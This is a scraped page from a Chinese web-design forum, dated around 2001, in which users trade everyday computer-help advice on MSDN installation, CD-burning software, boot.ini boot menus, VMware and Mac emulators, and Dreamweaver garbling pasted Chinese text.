 发表于 2001-12-19 18:46:48 按此观看sunnyleo的个人资料 该用户不允许显示它的电子邮件 访问sunnyleo的主页 sunnyleo 的 oicq 是64124700,查看 64124700 的资料 发送悄悄话给sunnyleo 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sunnyleo的IP
msdn一般有两张盘
第一张安装
第二张运行，需要光盘运行
不过你可以用个虚拟光驱

现实一种，没有虚构，没有幻想，真实人生...
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-19 19:35:02 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
就是资料库了

WINDFLASH
::浅紫色FORUM::
POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2001-12-19 23:09:27 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
sunnyleo在上个帖子中说
引用:
msdn一般有两张盘
第一张安装
第二张运行，需要光盘运行
不过你可以用个虚拟光驱

？你用的什么版啊？我从来就是3张盘，装完就用，不需要光盘启动~~~

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

上一贴 | 下一贴
快速回复 | 主题：vb上面怎么安装mdsn Library？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请推荐：刻盘用什么软件

计算机技术
请推荐：刻盘用什么软件

上一贴 | 下一贴
发表人 主题: 请推荐：刻盘用什么软件
CrazyParty

群山之巅
积分：2164
发帖：811
来自：温州
注册：2000-10-14
 发表于 2001-12-19 09:19:20 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 收藏该主题供以后查看 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
是用CDRW刻CDR，要速度最快的，谢谢。

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-12-19 09:35:40 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
Easy Creator
Nero

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

AirTree

超级用户
积分：375
发帖：229
来自：帝国时代
注册：2001-12-07
 发表于 2001-12-19 10:56:19 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP
管你是CDR还是CDRW，用最经典的刻录软件就好了，楼上的选择绝对是正确的，既专业又容易上手，你可以试试。

至于刻录的速度，呵呵，那决定于你刻录机的速度了，想快一点，去换个最新的吧，呵呵。

上帝保佑！

打雷了！下雨了！大家快回家收衣服啊……
西门吹牛

终级用户
积分：692
发帖：281
来自：杭州
注册：2000-09-29
 发表于 2001-12-19 13:23:40 按此观看西门吹牛的个人资料 按此发邮件给西门吹牛 发送悄悄话给西门吹牛 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看西门吹牛的IP
WinOnCD 3.8 Power Edition比较不错

我将一直寻找下去......
POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2001-12-19 14:31:07 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
速度最快----->Adeptec DirectCD 5.0

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

风灵

初级用户
积分：70
发帖：22
来自：GZ.GD.CN
注册：2001-08-25
 发表于 2001-12-19 14:41:16 按此观看风灵的个人资料 按此发邮件给风灵 访问风灵的主页 发送悄悄话给风灵 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风灵的IP
Clone CD 复制盘片的绝对选择！ ;)

灵感随风！
ArTooL.NeT
菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-12-19 14:43:56 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
POPOEVER在上个帖子中说
引用:
速度最快----->Adeptec DirectCD 5.0

这个好像在2000server下面装不上？

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

DayinNightout

超级用户
积分：338
发帖：150
来自：CCF
注册：2000-12-18
 发表于 2001-12-19 16:57:57 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP
Nero + CDRWIN

木有签名#@$%
上一贴 | 下一贴
快速回复 | 主题：请推荐：刻盘用什么软件
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


进入系统前的顺序选择~~

计算机技术
进入系统前的顺序选择~~

上一贴 | 下一贴
发表人 主题: 进入系统前的顺序选择~~
every78924

终级用户
积分：1359
发帖：605
来自：beijing
注册：2001-07-30
 发表于 2001-11-21 11:50:09 按此观看every78924的个人资料 按此发邮件给every78924 访问every78924的主页 every78924 的 oicq 是123713521,查看 123713521 的资料 收藏该主题供以后查看 发送悄悄话给every78924 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看every78924的IP
现在我的机器上有两套系统 2k & xp xp是刚刚装的 一不小心xp又装了一次
现在我进入系统前 有一个选择的界面 xp , 2k, xp的安装 这三个选项能不能调整顺序或是删掉(xp的安装 ) 谢谢~

[ Every 78924 ]
2smile

活着就好
积分：1622
发帖：1907
来自：SD
注册：2001-05-13
 发表于 2001-11-21 13:51:27 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
打开幕c:\boot.ini看看就知道了。

想见不如怀念?
thinktip.com
msn: thinktip@hotmail.com
icq: 98885338
greenyang

终级用户
积分：799
发帖：235
来自：山东莱阳
注册：2001-09-11
 发表于 2001-11-21 16:02:19 按此观看greenyang的个人资料 按此发邮件给greenyang 访问greenyang的主页 greenyang 的 oicq 是2114123,查看 2114123 的资料 发送悄悄话给greenyang 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看greenyang的IP
那你把XP安装完，那第三个选项就没啦，因为你“一不小心”没装完。

是　谁　无　事　种　芭　蕉，
早　也　潇　潇，晚　也　潇　潇　！
every78924

终级用户
积分：1359
发帖：605
来自：beijing
注册：2001-07-30
 发表于 2001-11-21 16:59:06 按此观看every78924的个人资料 按此发邮件给every78924 访问every78924的主页 every78924 的 oicq 是123713521,查看 123713521 的资料 发送悄悄话给every78924 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看every78924的IP
2smile在上个帖子中说
引用:
打开幕c:\boot.ini看看就知道了。

[ Every 78924 ]
hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-22 19:23:34 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
在2K里，右键单击我的电脑——>属性——>高级——>启动和故障恢复，里面有一个启动的时候的顺序、时间的选项。

如果要换显示的名字就改boot.ini，其实推荐不去改动boot,既然有图形界面的话，就尽量避免文字界面

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
arrive

终级用户
积分：1231
发帖：410
来自：大连
注册：2000-12-02
 发表于 2001-11-23 11:42:52 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
在xp中就可以改变顺序！

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
q72

初级用户
积分：19
发帖：64
来自：北京
注册：2001-08-17
 发表于 2002-01-02 04:10:33 按此观看q72的个人资料 按此发邮件给q72 q72 的 oicq 是9017917,查看 9017917 的资料 发送悄悄话给q72 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看q72的IP
ok,新年来，我去公司帮你修一下，boot.ini就是了.别忘打分啊

但是我对自己很不满意!

上一贴 | 下一贴
快速回复 | 主题：进入系统前的顺序选择~~
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


VMware 模拟器

计算机技术
VMware 模拟器

上一贴 | 下一贴
发表人 主题: VMware 模拟器
赵鹏

初级用户
积分：9
发帖：1191
来自：福建福州
注册：2001-04-02
 发表于 2001-12-19 03:06:02 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 收藏该主题供以后查看 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP

看到了么
在Win2000中以窗口方式运行的Win98

模拟软件VMware
可在 http://www.vmware.com 获得
允许在Windows平台模拟98、95、2000、XP、Liunx、OS/2、FreeBSD
由于这是硬件模拟器
因此所模拟出来的系统是真正的系统

模拟器开机后可进行BIOS设置

在DOS方式下格式化C:
所看到的C:实际上是在现有硬盘上建立的一个文件
如果你划分给模拟器1G的硬盘空间
那么实际上相当于在本机硬盘上建立了一个1G的文件

开始安装Windows 2000

安装了一半的时候

模拟出来的系统可以通过本机的网络连接上网
还可以与本机组成局域网结构共享文件
随着硬件技术的发展
模拟器唯一的瓶颈—速度
会得到改善的

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-19 16:48:46 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
不错，初一看，我还以为是远程控制呢。

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

darkvn

小混蛋
现任版主
积分：8225
发帖：2542
来自：不是外星
注册：2001-03-02
 发表于 2001-12-19 16:52:49 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
好家伙，有意思。

Blueidea Web Team
Moderator Of Dreamweaver & Javascript
jdom

初级用户
积分：0
发帖：5
来自：上海
注册：2001-12-19
 发表于 2001-12-19 17:17:34 按此观看jdom的个人资料 按此发邮件给jdom 发送悄悄话给jdom 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jdom的IP
只要硬件支持, 有足够的硬盘空间, 足够的Ram, 可以安装n个操作系统
什么Linux,...Win3.1, Win95, Win98, WinMe, WinNT, Win2000...

从明天起, 做一个幸福的人
喂马, 劈柴, 周游世界
从明天起, 关心粮食和蔬菜
我有一所房子, 面朝大海, 春暖花开

从明天起, 和每一个亲人通信
告诉他们我的幸福
那幸福的闪电告诉我的
我也将告诉每一个人

给每一条河每一座山取一个温暖的名字
陌生人, 我也为你祝福
愿你有一个灿烂的前程
愿你有情人终成眷属
愿你在尘世获得幸福
我也愿面朝大海, 春暖花开

上一贴 | 下一贴
快速回复 | 主题：VMware 模拟器
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


如何在PC机上安装APPLE的MacOS系统？

计算机技术
如何在PC机上安装APPLE的MacOS系统？

上一贴 | 下一贴
发表人 主题: 如何在PC机上安装APPLE的MacOS系统？
freedesigner

超级用户
积分：315
发帖：85
来自：
注册：2001-02-20
 发表于 2001-12-18 14:58:01 按此观看freedesigner的个人资料 按此发邮件给freedesigner freedesigner 的 oicq 是4322258,查看 4322258 的资料 收藏该主题供以后查看 发送悄悄话给freedesigner 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看freedesigner的IP
前两天看了部分关于MacOS的介绍和*.mov文件，觉得十分的向往！
但是手上又只有PC机，有没有什么办法可以让PC机运行APPLE的东东呢？

我就是石头，石头就是我
-==37c==-stone
len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2001-12-18 16:00:32 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
装得了吗?

Dripping water wears away a stone.
风灵

初级用户
积分：70
发帖：22
来自：GZ.GD.CN
注册：2001-08-25
 发表于 2001-12-18 16:18:38 按此观看风灵的个人资料 按此发邮件给风灵 访问风灵的主页 发送悄悄话给风灵 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风灵的IP
PC上已经有部分软件可以模拟，前些时间也在《电脑报》上看见过。不过该软件比较难找，而且必须要从mac机上提取一个什么文件（具体忘记了，要翻资料）。比较地麻烦。

灵感随风！
ArTooL.NeT
sunnyleo

高级用户
积分：183
发帖：217
来自：大连
注册：2001-05-13
 发表于 2001-12-18 16:44:49 按此观看sunnyleo的个人资料 该用户不允许显示它的电子邮件 访问sunnyleo的主页 sunnyleo 的 oicq 是64124700,查看 64124700 的资料 发送悄悄话给sunnyleo 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sunnyleo的IP
有这种模拟器
但是只能够模拟MAC OS 8.1　或更早版本的MAC
最著名的模拟软件称作 BasiliskII

你需要的是一个MAC的BIOS影像文件
MAC启动盘影像文件
和一张MAC OS系统安装光盘

下列地址可能可以帮助你
http://www.kearney.net/~mhoffman/
http://fusion.inhk.net/
http://www.delphi.com/n/main.asp?webtag=macemulation&nav=messages&msg=1451.1
http://www.kearney.net/~mhoffman/basiliskII/system753_tutorial/
http://www.emaculation.com/
http://mes.emuunlim.com/mes/index.htm

(感谢赵鹏提供此信息！)

现实一种，没有虚构，没有幻想，真实人生...
阿修罗飞天舞

无关风月
现任版主
积分：2272
发帖：2263
来自：杭州
注册：2001-05-21
 发表于 2001-12-18 17:30:19 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
只是让你感觉像MAC而已,一句话,如果你喜欢,装个桌面就好了
唉,真能像MAC那就无须PC了
笨PC,让我多用点资源会死么?

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

赵鹏

初级用户
积分：9
发帖：1191
来自：福建福州
注册：2001-04-02
 发表于 2001-12-18 18:07:41 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
阿修罗飞天舞在上个帖子中说
引用:
只是让你感觉像MAC而已,一句话,如果你喜欢,装个桌面就好了
唉,真能像MAC那就无须PC了
笨PC,让我多用点资源会死么?

可不是哦
那是真正的MAC OS系统
模拟器模拟的不是软件平台
是硬件平台

还记得我以前贴过在Win2000下以窗口运行Win98的那个模拟器么
那个也是硬件模拟平台

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
阿修罗飞天舞

无关风月
现任版主
积分：2272
发帖：2263
来自：杭州
注册：2001-05-21
 发表于 2001-12-18 20:22:03 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
我找不到了，还好我不玩这个，否则真是可怕

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2001-12-18 20:33:42 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
呵呵，我以前用Mac G3模拟Win98

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

风灵

初级用户
积分：70
发帖：22
来自：GZ.GD.CN
注册：2001-08-25
 发表于 2001-12-19 14:04:17 按此观看风灵的个人资料 按此发邮件给风灵 访问风灵的主页 发送悄悄话给风灵 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风灵的IP
在PC上装Mac模拟器，我还没有试过。不过在Mac上装PC模拟器就真是不敢恭维了，慢得要命。

灵感随风！
ArTooL.NeT
ladeng

初级用户
积分：94
发帖：44
来自：山东
注册：2001-09-21
 发表于 2001-12-19 16:16:54 按此观看ladeng的个人资料 按此发邮件给ladeng 访问ladeng的主页 发送悄悄话给ladeng 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ladeng的IP
freedesigner在上个帖子中说
引用:
前两天看了部分关于MacOS的介绍和*.mov文件，觉得十分的向往！
但是手上又只有PC机，有没有什么办法可以让PC机运行APPLE的东东呢？

《电脑爱好者》24期上有介绍，用个模拟器，可以试一下的

俺是来学习的：）
上一贴 | 下一贴
快速回复 | 主题：如何在PC机上安装APPLE的MacOS系统？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


DW4为何粘贴中文会变成问号？

计算机技术
DW4为何粘贴中文会变成问号？

上一贴 | 下一贴
发表人 主题: DW4为何粘贴中文会变成问号？
阿P

@1981
积分：1289
发帖：539
来自：@1981.COM
注册：2000-11-03
 发表于 2001-12-19 19:06:13 按此观看阿P的个人资料 按此发邮件给阿P 访问阿P的主页 阿P 的 oicq 是223607,查看 223607 的资料 收藏该主题供以后查看 发送悄悄话给阿P 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿P的IP
请问我用 DW4 粘贴TXT 文档里的汉字的时候会变成问好。

而英文和数字可以？ 为什么？如果解决呢 ？

急啊 麻烦大家了/

www.@1981.com
myhyli

现任版主
积分：20379
发帖：4790
来自：
注册：2000-07-22
 发表于 2001-12-19 19:19:51 按此观看myhyli的个人资料 按此发邮件给myhyli 发送悄悄话给myhyli 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看myhyli的IP
页面编码是否设置成了英文？或者big5等？

Myhyli
www.blueidea.com/user/myhyli

Blueidea Web Team
Moderator Of Dreamweaver & Javascript

阿P

@1981
积分：1289
发帖：539
来自：@1981.COM
注册：2000-11-03
 发表于 2001-12-19 19:51:46 按此观看阿P的个人资料 按此发邮件给阿P 访问阿P的主页 阿P 的 oicq 是223607,查看 223607 的资料 发送悄悄话给阿P 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿P的IP
GB2312啊

您是说这吗？

我现在选的就是 GB2312

www.@1981.com
天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2001-12-19 20:08:49 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
说不定你粘贴了系统没有的字体

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
poorfish

经典圣僧
现任版主
积分：10941
发帖：3503
来自：江西萍乡
注册：2000-12-04
 发表于 2001-12-19 21:16:54 按此观看poorfish的个人资料 按此发邮件给poorfish 访问poorfish的主页 poorfish 的 oicq 是1525464,查看 1525464 的资料 发送悄悄话给poorfish 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看poorfish的IP
我也有这种问题，不仅仅是在DW中，其它软件也会出现
系统是XP加中文语言包

转到计算机技术版问问

【DW版常见问题解答】【破废墟】

Blueidea Web Team
Moderator of DW & JS Forum

嘿嘿

坏笑
积分：403
发帖：524
来自：
注册：2001-10-06
 发表于 2001-12-20 10:23:44 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
好象在早期的win2000版本出现过这种情况，但后来就没再见过了。

缘是天定,份在人为.
donger

SmallOgre
积分：5913
发帖：3342
来自：
注册：2000-07-22
 发表于 2001-12-20 10:30:44 按此观看donger的个人资料 按此发邮件给donger 访问donger的主页 发送悄悄话给donger 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看donger的IP
我将DW中的代码拷贝到记事本中，中文都是乱码，怎么解决呀

Enough is as good as a feast.

Blueidea Web Team

blueonline

Blueonline
积分：815
发帖：1676
来自：blue-online.
注册：2000-12-09
 发表于 2001-12-20 17:01:34 按此观看blueonline的个人资料 按此发邮件给blueonline 访问blueonline的主页 blueonline 的 oicq 是2048486,查看 2048486 的资料 发送悄悄话给blueonline 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看blueonline的IP
c&p的时候把中文输入发打开

流自己的汗，吃自己的饭，靠天、靠地不如自己干。

:::::::bLUE-oNlINE.nET || vERSION 2001 ───────

月闪闪

终级用户
积分：2252
发帖：1261
来自：香格里拉
注册：2000-09-25
 发表于 2001-12-20 20:58:05 按此观看月闪闪的个人资料 按此发邮件给月闪闪 访问月闪闪的主页 月闪闪 的 oicq 是2855760,查看 2855760 的资料 发送悄悄话给月闪闪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看月闪闪的IP
我这也经常出现乱码，有时候是在纯文本中粘贴，也支出现乱码。真的是很奇怪。

要跳要舞，羊男说
阿P

@1981
积分：1289
发帖：539
来自：@1981.COM
注册：2000-11-03
 发表于 2001-12-20 21:15:45 按此观看阿P的个人资料 按此发邮件给阿P 访问阿P的主页 阿P 的 oicq 是223607,查看 223607 的资料 发送悄悄话给阿P 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿P的IP
我用的就是 比较早版本的WIN2000

我用其他工具 打开文档 然后可以了。 很怪。

www.@1981.com
wx@ay

看不懂
积分：7349
发帖：5076
来自：ay.ha.cn
注册：1999-12-23
 发表于 2001-12-20 22:33:58 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
这个问题不仅仅是粘贴时存在，即使是在文档编辑时，输入中文有时也会发生。

可以肯定你的文档全部是双字节的，
而在DW中，默认是有一个单字节的空格的。

所以，粘贴后在CODE状态下删除你所粘贴的文档前的所有空白，
一般问题就可以解决了。需要段前空格的话，再回到编辑状态用中文双字节输入即可。
（一定要用双字节输入，就是智能ABC下SHIFT+SPACE）

不过我建议最好在CODE状态下粘贴外来文档。

至于COPY DW中的代码到NOTEPAD中出现乱码，同样也是这个原因。
不过这个完全可以不去COPY ，
到浏览器中预览，然后查看原文件就行了。

Think like a Genius.

忘掉她/忘掉你没有的东西/忘掉别人的东西/忘掉你失去以后就不能再得到地东西/忘掉仇恨/忘掉屈辱/就像犀牛忘记草原/水鸟忘记湖泊/地狱忘记天堂/落叶忘记风/但是我决定不忘掉你

Bobofu

终级用户
积分：464
发帖：414
来自：北京
注册：2000-09-01
 发表于 2001-12-21 11:23:31 按此观看Bobofu的个人资料 按此发邮件给Bobofu Bobofu 的 oicq 是6376850,查看 6376850 的资料 发送悄悄话给Bobofu 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Bobofu的IP
我也遇到过这个问题

解决办法：先拷贝到office2K的word里，然后粘出来，就没有乱码了

原因：不知

人生，充满取舍......
上一贴 | 下一贴
快速回复 | 主题：DW4为何粘贴中文会变成问号？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


一个word的问题？？？？

计算机技术
一个word的问题？？？？

上一贴 | 下一贴
发表人 | 主题: 一个word的问题？？？？
宇宙星云 终级用户 积分：474 发帖：305 来自：广州 注册：2000-12-13 | 发表于 2001-12-31 01:57:33 按此观看宇宙星云的个人资料 按此发邮件给宇宙星云 宇宙星云 的 oicq 是365435,查看 365435 的资料 收藏该主题供以后查看 发送悄悄话给宇宙星云 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看宇宙星云的IP 本人是一word菜鸟，编辑文档时候，对齐右边对我来说颇为头疼，无论怎么调节，总是有一个或半个字符没能对齐。哪位大虾指点一下。 ┏━━┓∴· oooO Oooo°∴┏━━┓ ┃拒绝┃°ぎ ( ㊣) ( ㊣)ぎ·┃珍惜┃ ┃網戀┃∴☆ \ ( ) / ☆∴┃生命┃ ┗━━┛★．° \_) (_/·．★┗━━┛
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2001-12-31 13:48:21 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 微调强行对齐 按住alt再移动文档上班的缩进标签~ A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
上一贴 | 下一贴
快速回复 | 主题：一个word的问题？？？？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


